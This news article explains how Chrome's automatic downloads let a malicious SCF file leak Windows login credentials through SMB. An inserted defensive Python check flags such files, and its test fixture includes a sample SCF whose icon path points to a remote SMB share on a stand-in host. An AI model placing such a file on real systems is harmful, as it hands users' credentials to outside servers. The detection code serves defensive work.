A security researcher was able to create an SCF file based on a URL.
Just when you thought Microsoft’s recent Windows security patch following the WannaCry attack was going to keep you protected for a while, a new announcement lands in your inbox. This one, which relies on a combination of two different attack methods, lets outsiders steal your Windows credentials with hardly any effort at all.
There’s no question that Google Chrome is the most widely used browser on the planet, and that might be part of the problem. Chrome makes it far too easy to infect a computer with a malicious SCF file, or shell command file, which is a pretty basic, everyday retrieval tool. Microsoft recently patched some behaviour of these mundane file types after a wave of attacks based on stolen NSA data (the NSA discovered several Microsoft vulnerabilities and sat on that information in order to use them to its own benefit), but the SCF file vulnerability wasn’t closed by that patch.
SCF file based on URL
It gets worse. A security researcher was able to create an SCF file based on a URL. When the icon image for the SCF is retrieved from a deliberately malicious URL, the file “speaks” to a server. According to a detailed report by Catalin Cimpanu for BleepingComputer, “whenever the user’s computer will try to load that icon from this SMB server, the server will ask and receive the user’s login credentials, the user’s computer thinking it needs to authenticate. The problem is that these SMB requests take place whether users want it or not.”
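A defender-side check for the mechanism described above, added here as an example (it is not code from the article or from DefenseCode): it parses the [Shell] section of an SCF file and flags an IconFile entry that points at a UNC network path, since that is what makes Windows issue the SMB authentication request when the folder is displayed. The two sample files and the host name in them are constructed for the test.

```python
import re
from typing import Dict, List, Optional

# Constructed sample SCF contents (not taken from any real incident).
# An SCF file is a tiny INI-style file; Explorer reads IconFile from [Shell]
# to decide where to fetch the icon. A local path is harmless; a UNC path
# (\\host\share\...) makes Windows open an SMB connection to that host.
LOCAL_SCF = r"""[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""

REMOTE_SCF = r"""[Shell]
Command=2
IconFile=\\smb-host.example\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Matches a UNC prefix and captures the host (a name or an IP address).
UNC_PATH = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parse: {section: {key: value}} with names lower-cased."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str) -> Optional[str]:
    """Return the host named in a UNC IconFile path, or None if the icon is local."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_PATH.match(icon)
    return match.group(1) if match else None


def flag_scf_files(files: Dict[str, str]) -> List[str]:
    """Names of SCF files (name -> contents) whose icon would be fetched over SMB."""
    return [name for name, body in files.items() if remote_icon_host(body)]
```

Running `flag_scf_files({"local.scf": LOCAL_SCF, "remote.scf": REMOTE_SCF})` reports only the second file, which is the kind of check a download-folder scanner or mail gateway can apply before a user ever opens the folder.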
Bosko Stankovic of DefenseCode does have a little suggestion for anyone not wishing to hand their login credentials to any hacker who manages to infect them with a malicious SCF file. Chrome users can change their settings so that the browser asks where to save each file instead of downloading it automatically; short of that, Stankovic recommends a firewall that blocks local computers from answering SMB server requests.